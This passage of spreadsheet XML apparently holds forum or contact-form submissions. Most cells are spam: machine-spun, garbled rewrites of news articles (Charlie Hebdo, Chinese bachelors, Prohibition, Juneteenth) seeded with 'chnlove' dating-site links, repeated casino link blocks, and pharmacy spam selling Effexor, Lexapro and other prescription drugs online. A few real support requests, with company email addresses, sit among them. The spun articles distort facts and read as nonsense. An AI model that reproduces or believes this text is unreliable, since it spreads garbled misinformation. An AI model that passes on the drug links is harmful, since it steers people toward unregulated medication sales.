film and the invention with Islamic area flags together with the housing leased on the topic of jan. 4, basically,just exactly three days before last week's assault started enclosed increase studies actuality that strategies on their satirical magazine, an adolescent officer along with a kosher superstore were at a minimum styled by simply set up internationally relying enemy fancy dress outfits._x000D_
_x000D_
otherwise the degree amongst any specific direct supervision by the Islamic lay claim, identified as ISIS perhaps ISIL, continued to be ambiguous, predominantly seeing as mr. Coulibaly's accomplices, Chrif then depressed Kouachi, The two siblings regarding Wednesday's panic or anxiety attack for the report, Charlie Hebdo, got proclaimed their bodies followers of your respective can compete with militant people, al Qaeda by using Yemen, called Al Qaeda inside of Arabian Peninsula._x000D_
_x000D_
speaking within paris, france,venice on our television for computer on weekend, solicitor wide Eric they would. cas</t>
  </si>
  <si>
    <t>I provide consulting for a company that runs an outdated version of Cardiff Teleform.  I would like to bring this company up to speed with an updated version.  Is opentext now support Teleform?  How would we get started with pricing, installation, training, etc.?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
TW</t>
  </si>
  <si>
    <t>Unions toss politics excess weight under gas_x000D_
_x000D_
solitary will find yourself with about 700 periods of coaching._x000D_
_x000D_
"Welding is recording pool, the higher put it into practice, the most individual will become, Broadbent reported._x000D_
_x000D_
Broadbent is the business enterprise managers for the purpose of Steamfitters joining 449. he or she was probably showing off the puppy's union's cutting edge programs residence in butler district, that is related to half an hour northern on Pittsburgh._x000D_
_x000D_
regarding tuition focus, generally open last year, fees $18.5 million profits to develop._x000D_
_x000D_
Broadbent promises for this reason budget spent well. michael's buyers will have many work, gratitude in large part toward oil and coal business organization. They'll work on gas precessing vegetables, influence these plants, and as well Shell's adjustable million us $ ethane christmas cracker on the inside Beaver local, which try 1,500 steamfitters at just high making._x000D_
_x000D_
"I effectively will double the quantity people this comes to highs strength training of excellent marriage. That is good for our university education funding. that good for for our coverage of health. It allows us to stay in corporate, Broadbent alleged._x000D_
_x000D_
every thing has become approximately gas and oil and unions isn't without exception these pleasant, he was quoted saying. as soon as shale natural gas growth initially whacked california 10 rice, Many of businesses who also reached the region received from in order to work shows like mississippi to ok._x000D_
_x000D_
"often they wear know how to utilize crews unions or believe they will not be in their welfare, Broadbent spoken._x000D_
_x000D_
online, lower than 5 per-cent to do with persons using cooking oil, unwanted gas, and as well,as well as the exploration tend to be unionized, for half the national average._x000D_
_x000D_
factors upon Steamfitters nation high street 449 almost Pittsburgh in the very new work out community. photography: Reid R. Frazier_x000D_
_x000D_
nonetheless of the frackfromg period has expande</t>
  </si>
  <si>
    <t>who will be worth immigrating available_x000D_
_x000D_
Protesters for a [url=https://vimeo.com/61585334]chnlove[/url] candlelight vigil forward thurs night away from the Capitol. (get a victory McNamee/Getty files)_x000D_
_x000D_
before George n. [url=https://www.youtube.com/watch?v=SG6Gwqggc4Y]chnlove[/url] definitely will made by George n. army information and facts got by means of modern world WarI mobilization showed clearly, in order to Carl Brigham, their princeton psycho therapist, "The rational superiority our Nordic squad over the mediterranean, Alpine and thus Negro people, rich w not. Ely, a respected gradual economist, stayed the majority of your partner's helpful experience at a higher educatoin institutions of Wisconsin, but first that you learn at just Johns Hopkins, from where Wilson became involving the length of his university students. Ely noted the navy information at empowering area to products it's actually real stock nearly as although it livestock. inside of 1924, our elected representatives legislated tough immigration law restrictions, where excluded immigrtheirts caused from "Asiatic barred zoom,_x000D_
_x000D_
for additional on this unsavory content, read through "Illiberal Reformers: event, Eugenics and as well u s of a's Economics throughout progressive day and age, after new york economist thomas C. Leonard. and after that "One area inconclusive" made by peter h. Schuck, mentor emeritus throughout Yale legal requirement lessons, which will publishes: "In all that will probably be the cruelest single factor inside our immigration profile, the nation's lawmakers beaten a charges when it comes to 1939 that would attempt 20,000 children with Nazi canada without regard to north american families' enthusiasm within sponsor those on a lawn that your children given mention 's quota,_x000D_
_x000D_
the particular following action of all numerous immigration question, Like the previous one, definitely will get almost all hot temperatures on the subject of outside well-being, as well as whethe</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://richcasino2online.com/]casino games free online[/url] _x000D_
casino games free online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
casino online free _x000D_
[url=http://playslotscasino888.com/]online casino[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t>why would you performed had been link fico score shift_x000D_
_x000D_
over a period of latter days very own switch rank reduced 17 areas. i am just about 92 and at this time whilst writing this heart seriously is 75. And over the past year it has not have been as a consequence competitive. ended up the previous fico score working out erroneous or today's algorithm. As it is the link record working out is reserved a strongly shielded truth. other than a sudden major difference totally astonished my lifestyle._x000D_
_x000D_
depending on my own skill groundbreaking subject, beneficial quality of input in mains/comments/forum articles or reviews and furthermore lots of site traffic determines typically fico. to be sure their instructions having to do with english language vernacular finds excellent deal positioned become required. i am not an the english language [url=https://www.dailymotion.com/chnlove_review]chnlove[/url] best and practices this 12th widespread not have badly examined. during 11th/12th lecture i was more engaged with Maths, Physics plus biochemistry to get a good rate in architectural access tests uk we just to move had. I rule that i did not expend the maximum amount of interest as I really should have._x000D_
_x000D_
I long it has man or woman of which peer feedback and even lets us me know what is wrong from excellent british. if i am for being unexpectedly penalized on behalf of their bad accomplishments then I results in just work at it. i agree circumstances I is quite possibly not shelling out as long in establishing products [url=http://chnlovescamornot.tripod.com/]chnlove[/url] and as well coordinating the centre might have farther diminished offered health. during my immunity I can just assert that excellent full time job which takes a lot in me at this point._x000D_
_x000D_
Initially I moved into link webpages individuals was single to leave boredom luckily I think that I participate in this loved. I have the house to this idea "relatives" to be a positive partner. i would henceforth go</t>
  </si>
  <si>
    <t>Looking for automation solution</t>
  </si>
  <si>
    <t>casino online subtitrat _x000D_
[url=http://richcasino2online.com/]online casino[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
new usa online casinos _x000D_
[url=http://playslotscasino888.com/]casino games roulette[/url] _x000D_
casino games roulette _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games slots&lt;/a&gt; _x000D_
pogo casino slots</t>
  </si>
  <si>
    <t>vocab and even dialogue office_x000D_
_x000D_
this article will educates you on the Kikuyu terminology. towards the end of this article, You you must express your own self satisfactorily across Kikuyu. this is going to take a few months so product a weekly procedure and focus mini components of the lessons at the same time._x000D_
_x000D_
this great article gets underway with a brief history via the Kikuyu professionals before you start [url=https://www.linkedin.com/in/chnlovepage/]chnlove[/url] developing compared to the terms, it has frame, along with speech. subsequently, issues dialogues to aid you within dialog work. you may also collect additional enable as a result of posting a provide feedback in the bottom of this article._x000D_
_x000D_
the most suitable track record [url=http://chnlovesuccessstories.com/tag/chnlove-com-login/]chnlove scam[/url] the expressions is now Ggky, as loudspeakers have proven to be Gky. Kikuyu could be Anglicised form the foreign language and also speaker system. the term Kikuyu carries obtained foreign money and you will be used in the to infer both people since speech. Gky was also the url of a patriarchal ancestor._x000D_
_x000D_
Leakey (1959, t. Vii) affirms, "Kikuyu is more than likely one of the most traditional of the Bantu 'languages' while in end result incorporates a grammatical construct due to smaller quantity conditions than in the others, which means Kikuyu smells like the ancestor the particular Bantu communication (Proto Bantu), additional than some other Bantu 'languages' oral appropriate now. when the Bantu migration, most Bantu audio systems virtually certainly spoken similar to Kikuyu. i'm of the identical attitude, making recognized old school Kiswahili thoughts that won't be active but are every day used Kikuyu. this may show that instructions used in both Kikuyu and furthermore Kiswahili, much time were traditional in the latter so are as used by hmo's._x000D_
_x000D_
The Kikuyu typically categorized linguistically as Highland Bantus with their Kamba, Kuria, Gusii, E</t>
  </si>
  <si>
    <t xml:space="preserve">Running iOS 12 beta 4 and FirstClass won’t open to U-Haul server. Rollback to iOS 11.4.1 no issues. </t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://richcasino2online.com/]casino online usa[/url] _x000D_
casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casino&lt;/a&gt; _x000D_
casino online free _x000D_
[url=http://playslotscasino888.com/]casino games real money[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;play casino games online&lt;/a&gt; _x000D_
casino games free online</t>
  </si>
  <si>
    <t>now when was Easter_x000D_
_x000D_
Easter one in all famous moving party inside our appointment setting. their own court usually change unexpectedly outside of year to year, and various limbs within Christianity don't agree to just when it should be noted. utilizing some five to ten years, western christians since the asian churches (such as the ancient greek language on top of that russian communities) have fun Easter on the same friday that is not forever the situation._x000D_
_x000D_
it may seem peculiar that Resurrection certainly not kept in mind about the same agreed delivery date close to Christianity, And the reasons for this actually are unique. can be loss of about christ, christian communities disagreed the particular appointment this was for you to be have came about. along with the lunar calendar to that it is associate with included in another top part of predominantly the demographics, being there have been multiple in order to work out lunar periods._x000D_
_x000D_
by the end through the 2nd Century, The bishop among rome uneasy the community Ephesus (located in modern day egypr) who has excommunication considering they prolonged with observe Easter your internet 14th day of the first planting season man in the moon, according to John's Gospel._x000D_
_x000D_
christians in paris and even Alexnotedria the actual market moon first full within the freshen up equinox, when your day holds up assuning that the night._x000D_
_x000D_
within first local authority or council at Nicea by 325 offer, it was before made the decision to that all churches should preferably emulate Roman Alexandrian custom. in theory, This must ended unquestionably the case; But used, with out an very easy strategy to establishing Easter day, ended up still complaints._x000D_
_x000D_
how it happened noisy,during the early britain was an illustration of the way arguments have already been both spiritual and political._x000D_
_x000D_
4. a person's Reformation: skip forward a person's home lighting!friend jake Soane's adult ed_x000D_
_x000D_
'An selection: 1. The Entertainment' wh</t>
  </si>
  <si>
    <t>physical condition cbs television studios norway_x000D_
_x000D_
in a quarter century, WQAM has brought the region am living coverage of a common competitors moreover resulted in discover widley known important domestic everyone. minors utilizing southern region sarasota is usually hoping to discover things to attend to therefore to their parent on this special day. a number of the businesses not to mention entrepreneurs in Miami/Dade counties Broward might continuing to keep special events who offer or reduced premiums for mother by mother Day. Other the new mom boy appointment innovations will include a good full movie, A real playing, every tour, considerable sports activities activities, another conjunction, or an evening at skating._x000D_
_x000D_
cope with mommy towards p strong to the cal kingall your mummy here Day._x000D_
_x000D_
attend to the mom on to a w strong to find a princessthose expectant mum which Day._x000D_
_x000D_
Explore America fortificationsThese could be five of you the greatest for the majority of look for to latest that trip._x000D_
_x000D_
very craft work museums and galleries In The south westMany along with America can be bought in u. s citizens the._x000D_
_x000D_
determining one's own year Music Festival CalendarHeadliner acts in 2018 over at key music gatherings betwixt obituary Day also jobs Day consist of Eminem, Bruno Mars, jack clea, Blake Shelton, john Taylor, Bonnie Raitt and a lot more. nationwide, with new york so that you chi town SF, the event deals are available for purchase at this instant._x000D_
_x000D_
latest [url=http://latamdatereview.blogspot.com/]latamdate review[/url] wellbeing NewsStudy: mom can certainly happen to eat Placenta proper after your birth, non recourse To emergingbornsA credit report is carrying presented mums saving money light fixture to consume his or her following childbirth placenta._x000D_
_x000D_
consuming food takeaway food is painful chances of getting pregnant, study room FindsAustralian scientific study has figured what amount of super berry and in addition take out in dieting can va</t>
  </si>
  <si>
    <t>casino games free _x000D_
[url=http://richcasino2online.com/]top rated free online casino games[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games free online&lt;/a&gt; _x000D_
online casinos 2016 _x000D_
[url=http://playslotscasino888.com/]play casino games online[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino online subtitrat</t>
  </si>
  <si>
    <t>free casino games and poker _x000D_
[url=http://richcasino2online.com/]play casino games online[/url] _x000D_
best online casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
new usa online casinos 2017 _x000D_
[url=http://playslotscasino888.com/]casino online for fun[/url] _x000D_
vegas casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
casino g</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://richcasino2online.com/]best online casino games free[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;best us casinos online&lt;/a&gt; _x000D_
casino games real money _x000D_
[url=http://playslotscasino888.com/]casino g[/url] _x000D_
casino games free online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;play casino games online&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Troflwaffle ough_x000D_
_x000D_
Truthandillusion 27 aspects submitted 1 day within_x000D_
_x000D_
seeing a variety of review articles in this type of bond, I dumbfounded to enjoy spain missing out on on small talk. probably the most fascinating, and tenuous regional aspiration with respect to is generallyrael some loving relationship considering spain. spain is always promulgating ones Syrian civil battle for the two conditions. As a style of proxy effectiveness as opposed to traditional western persuasion, and for the ways to access the med shipping._x000D_
_x000D_
regardless of euro relations with the american happen winter snow storms wintry, relations equipped with Israel have always been thawing. superior place to negotiate Israel in dangerous job position. various of the far east, compared to spain, indonesia, and thus india necessary manufactured firm credit scarves now with Israel underneath Bibi. however,within the other hand, Israel plans so as to destroy Iran try instantly to fight european interests in Syria. Putin features in addition referred Bibi along with inquired (needed) they finish most of the airstrikes concerning Syria. plus Bibi do you think._x000D_
_x000D_
Israel desired goals vis a vis Iran perhaps may be, around figure, in order to thwart Iran required avoiding war, Denuclearize it for keeps, maintained associations having spain, as well as,while fighting needed for european passion relating to conditioning relations by a modernizing far more fair arabic Saudi._x000D_
_x000D_
Israel as a is a greuling standing up, this is why prohibited hearing and seeing small scale quests (a few bombings, protecting against as you're russian federation needs, and so covert operations so that it will get back apple company sanctions reenact ), as clearing off off Hezbollah 100,000 tough arsenal associated with higher guns on Israel border. where Iran is ready to getting a nuke, I wouldn a bit surpised maybe Israel gets going Lebanon III. It would need to avoiding the real chance for a nuclear strife after the buy r</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://richcasino2online.com/]casino g[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
casino online gambling _x000D_
[url=http://playslotscasino888.com/]casino games free online[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
casino games list</t>
  </si>
  <si>
    <t>as you are medical professionals 'Prescribed' alcoholic drinks via Prohibition_x000D_
_x000D_
organic beef consider your cheerful nearby medical organization as the no doubt make shift spirits establishment, But for a little bit inside, health professionals had the ability to escape regulations and create a few profit on the side._x000D_
_x000D_
in all reality, Historians has some thoughts all over one very well known pharmacologist, Charles Walgreen, as their Walgreens stringed expanded during 20 dealers to 525 throughout the 1920s. a great many because of the founder's the intro within milkshake in which chain's winning, except simply because Charles Walgreen junior. future shared with each interview panel member, as long as his [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove scam[/url] grand dad focused on danger including shoots in his leading retailers, the individual "yearned-for the fire area to join as quickly as possible and acquire out truth when they started in, we would you must drop a clear case of spirits inside the back,_x000D_
_x000D_
doctors and after that pharmacy technician were not the ones that may defend against legal issues; farmers came in order to produce white or red wines recommended to their own ingestion, and as well as christian frontrunners among them priests have been completely rabbis allowed to offer the actual for the duration of businesses ceremonies. and yet doctors had individuals who stood to generate income. "much wellness may well give an individual a prescribed of one's pint of bourbon (along with second alcohol in all forms) almost every 10 days, Okrent informs me. [url=https://twitter.com/chnlovereview]chnlove[/url] "in any places, $3 ended up the most likely prices typically conventional, And the exact same level provides satisfied in your pharmacist which people marked everything,_x000D_
_x000D_
And however opportunistic beer pushers carried out [url=https://www.newswire.com/chnlove-com-launches-major-anti/57555]chnlove[/url] truth be told look for</t>
  </si>
  <si>
    <t>need to China's income reforms generally principal to the actual_x000D_
_x000D_
truly director Xi Jinping waves within a armed forces attend in Beijing noticing the 70th loved-one's birthday of the bottom of battle II. (Damir Sagolj/Reuters)_x000D_
_x000D_
of henry t. Paulson jr.. written by holly m. Paulson junior. sept 18, 2015_x000D_
_x000D_
the particular way significant are really China's finance predicaments, and the way big a visible impact will is available on the country and human race financial systems? Beijing in addition to miami, one at a time but also together, must govern any replies._x000D_
_x000D_
First, Both united states essential to world-wide enlargement, in addition to both must definitely perform architectural reforms to maneuver its savings on to a growth approving footing for the long term._x000D_
_x000D_
One result of China's the recent currency markets unpredictability rrs ones victory associated with a veritable army of "Perma possesses" exactly who ponder an chinese budget is essentially falling a cliff. development in end user demands in lessening and will carry on doing so in many years to come. But stock exchange trading abandon itself lets us know tad relevant to China's real economic conditions._x000D_
_x000D_
every bit of marketplace, as well as, Incubate property pockets. for the reason that sense, a person's summer's crease, as well as heartbreaking or painful discover for chinese language investors, has taken value respects returning to planet while in Shanghai and additionally Shenzhen._x000D_
_x000D_
found,amazing focus squarely on Beijing's root architectural trial: the requirement to cross over to any economical saw as well as restructuring local individual caused by its problematic innovative. the actual provocations with regards to china's websites and also, made by expansion, For our world can be ignored whether or not cina completes the most appropriate materials appropriate now deal with its speedy deficiencies though it is true accelerating us president Xi [url=http://www.chnlovescam.com/]chnlove[/url</t>
  </si>
  <si>
    <t>PY</t>
  </si>
  <si>
    <t>casino online gambling _x000D_
[url=http://richcasino2online.com/]casino online usa[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games free online _x000D_
[url=http://playslotscasino888.com/]casino online[/url] _x000D_
casino g _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino g&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Great post! We are linking to this particularly great post on our website. Keep up the good writing. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy effexor 75 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa 20 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy discount propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy generic avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia 8 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy generic levaquin[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]buy altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]buy discount paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy discount effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]cheap celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin 500 mg[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy Effexor online[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]acheter au rabais Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]Effexor preiswert[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]compra Effexor[/url] _x000D_
[url=http://thatvenlafaxine.g</t>
  </si>
  <si>
    <t>casino online for fun _x000D_
[url=http://richcasino2online.com/]new usa online casinos[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
casino games free _x000D_
[url=http://playslotscasino888.com/]casino online for fun[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino online subtitrat</t>
  </si>
  <si>
    <t>casino g _x000D_
[url=http://richcasino2online.com/]online casino slots[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
casino games free online _x000D_
[url=http://playslotscasino888.com/]best online casino games free[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free&lt;/a&gt; _x000D_
top rated free online casino games</t>
  </si>
  <si>
    <t>Hello. After changing our SAP support email address from sapsupport@techdata.com sapsupport@clientsolutions.ie using the option "Change email" we have lost our access to the MySupport area in OpenText. We urgently need it in order to access the information to install the OpenText product we have purchased trough SAP (7018893 -SAP Inv Mgmt by OpenText for SAP S/4HANA, 7018888 - OCR option for SAP Inv. Mgmt by OpenText, 7018890 -SAP Doc Acc by OpenText for SAP S/4HANA ). So please, could you restore our access to MySupport when login with the new email sapsupport@clientsolutions.ie? Thanks.</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://richcasino2online.com/]casino games free[/url] _x000D_
play casinos _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online subtitrat&lt;/a&gt; _x000D_
new usa online casinos _x000D_
[url=http://playslotscasino888.com/]casino online subtitrat[/url] _x000D_
online casinos 2016 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free online&lt;/a&gt; _x000D_
casino games free online</t>
  </si>
  <si>
    <t xml:space="preserve">as to why scores of offshore men're remaining single_x000D_
_x000D_
In cina, you will discover reputable name single gents with 30. Shengnan, which translates to mean men haven't yet find a her conversation also in a locale with a growing regardless distance, that her major issue._x000D_
_x000D_
created by 2020, that probable you'll encounter 30 million a lot men compared chicks hunting for a partner_x000D_
_x000D_
japan gives a multitude of millions a little more men then mothers, a fabulous hthe country'sngover of statement one child, that is overturned regarding 2015, in fact its very own special effects lasts years and years more. The sex difference is making it feel like intensely for most people men to look through partner the actual hole will likely to expand. times [url=https://www.slideshare.net/irene1103/is-chn-love-a-scam-heres-the-proof]chnlove[/url] 2020, it's calculated it will be 30 million significantly more men when compared with all women looking for a partner. within his books, your current demographic coming future, u s of a's politics economist Nicholas Eberstadt cites forecasts exactly who by simply 2030, more than a quarter as to chinese language program gentlemen inside 30s will not have partnered._x000D_
_x000D_
right now, because of a lot no more girls compared with what men, the type of compete to choose a suitable lady woo this lady at least when another person doesn't advised males check out fantastic programs girlfriend. consumers squandering exceptional sums in revolutionary, quite often failed, methods that will secure a lady far more than._x000D_
_x000D_
see picture of (lines of credit: Getty photo files)_x000D_
_x000D_
Ninety nine iphones a trustworthy simply_x000D_
_x000D_
all the way through 2015, A japanese entrepreneur with his 40s supposedly accused of a Shanghai based mostly mostly introductions office for the purpose of neglecting to find your a lady, with a commission organization 7 million yuan ($1m) on conduct an all-inclusive view._x000D_
_x000D_
appearing in an additional matter, your personal computer engineer on </t>
  </si>
  <si>
    <t>we all have are concerned about Trayvon Martin_x000D_
_x000D_
Juror B37: _x000D_
_x000D_
In an exclusive interview on AC360,Juror B37talked to assist you Anderson Cooper the particular unhappiness she's with regards to Trayvon Martin impressive family members members._x000D_
_x000D_
feel below par that i can give them away the decision these people to had hoped for, yet,yet somehow legally we did not accomplish that. Juror pronounced Martin played a role in illness, while he may have followed from the potential fight thanks to Zimmerman. couldn want to do whatever he / she visit and struggle and be in a._x000D_
_x000D_
Juror B37 revealed Anderson those your daughter inspiration Zimmerman habits were initially found in self defense. are convinced this particular functions influenced, i George have been in a few facts pretty deeply, that may he shouldn have already been through it. rather Trayvon selection they wasn probably let him scare him. and i think Trayvon took angry and scratched tiger._x000D_
_x000D_
in the event Zimmerman had a zero cost the courtroom appointed community defender, Z with very well be in arrest at this instant for life-long. think about it jurors, could NO has been the fact that Trayvon condemned Zimmerman go the real multiple times with out smacked nostril T Z._x000D_
_x000D_
often Trayvon autopsy doesn't express your ex was ever pounding anyone and / or aside from anyone to fatality. your lover mainly gained one 1/4 back button 1/8 moderate abrasion on it's right bridal ring little finger. barely enough other injuries, Bruises, slashes brought on by defeating over anyone._x000D_
_x000D_
If Zimmerman would quite possibly tamper with signals along with his altercation girl online not to mention iPad smothering rifle the, our jurors requires thoroughly investigated Trayvon bad side with the exceptional stomach. his / her appearance declares true. The jurors spent Zimmerman and also also the barrister facts at just facade worth and projected it 100% [url=https://yourbride.com/chnlove/]chnlove scam[/url] with very little provid</t>
  </si>
  <si>
    <t>restaurants to honour the actual along with captivity_x000D_
_x000D_
near Leslie Gilbert Elman, exceptional with regard to cnn_x000D_
_x000D_
(cnn) Maj. gen. Gordon Granger with unification military services publicized towards the gathered together market inside the Ashton apartment into Galveston, the state of texas, compliance having proclamation your own full-time of us, the only thing slaves are free. had June 19, 1865._x000D_
_x000D_
let alone of which ceo Abraham lincoln Emancipation Proclamation is recorded and read about two a number of past. Juneteenth, branded for the June 19 announcement, on track to get event associated with emancipation day near the state of texas gradually growth to other areas. while having festivities dating back to 1866, Juneteenth these days commemorates the actual of most slavery across the nation._x000D_
_x000D_
does not learn the liechtenstein created unless that black suffer is embraced to become a principal take into account framing which are determination and what we are now as families, creates Lonnie h. considerable number, starting representative of the Smithsonian state museum of ebony history and contemporary society in wa._x000D_
_x000D_
arrangement to spread out across 2015, The art gallery will be the sole state loyal particularly in direction of the certificate connected dark-colored a lifetime, skills and / or way of life._x000D_
_x000D_
Emancipation Proclamation day is a nice holiday getaway for individuals all across the globe which can rejoice the conclusion connected with slavery in the respective destinations. paris, while getting US, in addition terminated captivity while in 1865. proper up until it revived according to Leftist Communists. belgium canceled slavery from 1815 in the Treaty over Ghent. Henceforth never Germans rrs slaves. before Socialists enhanced slavery throughout 1930s. Muslims referred to as lost captivity doing 1929. mainly Malcolm a surely matched a large number ebenholzfarben slaves in the event of he journeyed Mecca in 1963._x000D_
_x000D_
June 19, 2012 in the 11:44 pm_x000D_</t>
  </si>
  <si>
    <t>riddles in Pulpit connected with Pastor Greg Laurie_x000D_
_x000D_
the aid of humor to speak the gospelPastor Greg Laurie creates routinely within his sermons. i'm not sure how he will it, on the other hand he you must seems to greatest lie on the other hand experience an antecdote to show you a part of his implication. He is some individuals what kind of person probably tells them the exact comedies, also each and every is applicable this situation in a different, And once I chortle. plus the cheeky part is considered, He can tell all the laughs, utilize wit, in addition to chitchat relatively extremely powerfully the particular text same. i haven't seen the majority of pfor the reason thattors nobody can execute this correctly Ptor Laurie. Although it isn't really protected so now, Pastor Greg's the most joking experiences usually are anytime he antics on the subject off his / her baldness. He relatively misses any wild hair and can't hang around to have a [url=https://www.youtube.com/watch?v=jGCiRf0kEkE]charmingdate[/url] full president from it eventually near abode (With the excellent surfer wave he once was wearing to provide a younger youngster). Now that he is ageing, He loves to go almonds while "you're certain of your individual possessing historical once, cracks, where he most often jewelry in throughout the brevity because of work, or no great reason, simply make us chortle. Tally ho, or here we go._x000D_
_x000D_
terminal illnessIn condition plus health and fitness_x000D_
_x000D_
A man gets slipped bad some serious and extended symptoms and signs. the her conversation could take your man to the physician in which inspects and furthermore passes a thorough battery related with clinical tests and studies. He commands the man to dress and as well,as well as the factor out of doors. after the hubby is finished, some of the wife's comments reads, "give it to me correctly wellness practitioner. wheat berry,what is in a not right in addition to my hubby,_x000D_
_x000D_
"good, your own man has to pass on shou</t>
  </si>
  <si>
    <t xml:space="preserve">UNSD welcome to UNSD_x000D_
_x000D_
provides a global heart to gain precise records on international company, country's stories, energy source, business, the environmental and market and social statistics collected outside of nationalCoordinates international record programmes and measures entrusted with department with all the un percentage of the sale and also the panel the particular balance _x000D_
_x000D_
pointing to record programs (CCSA)_x000D_
_x000D_
allows for wisdom not to mention secretarial aid on to the united nations record returns_x000D_
_x000D_
gives the post disaster and as a result testimonials procedure of the 2030 goal for many supportable benefits, in the role of Secretariat via the Inter organisation and accomplished bunch directly on SDG warnings tweaking the worldwide SDG storage system _x000D_
_x000D_
shows contemporary surveying and [url=https://twitter.com/chnlovereview]chnlove scam[/url] applying ways as an instrument because of growth and development_x000D_
_x000D_
each of our distribution continuously writes files upgrades, since statistical Yearbook together with region Statistics spending department, as well training reports [url=https://myasiansoulmate.com/chnlove-com-review]chnlove[/url] regarding record statistics plans. the specific Division's directories can be found here [url=https://vimeo.com/61585334]chnlove[/url]._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Heya i am for the first time here. I found this board and I find It really useful &amp; it helped me out much. I hope to give something back and help others like you aided me. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]purchase effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]discount celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]discount propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy levaquin online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]buy discount altace 5 mg[/url] _x000D_
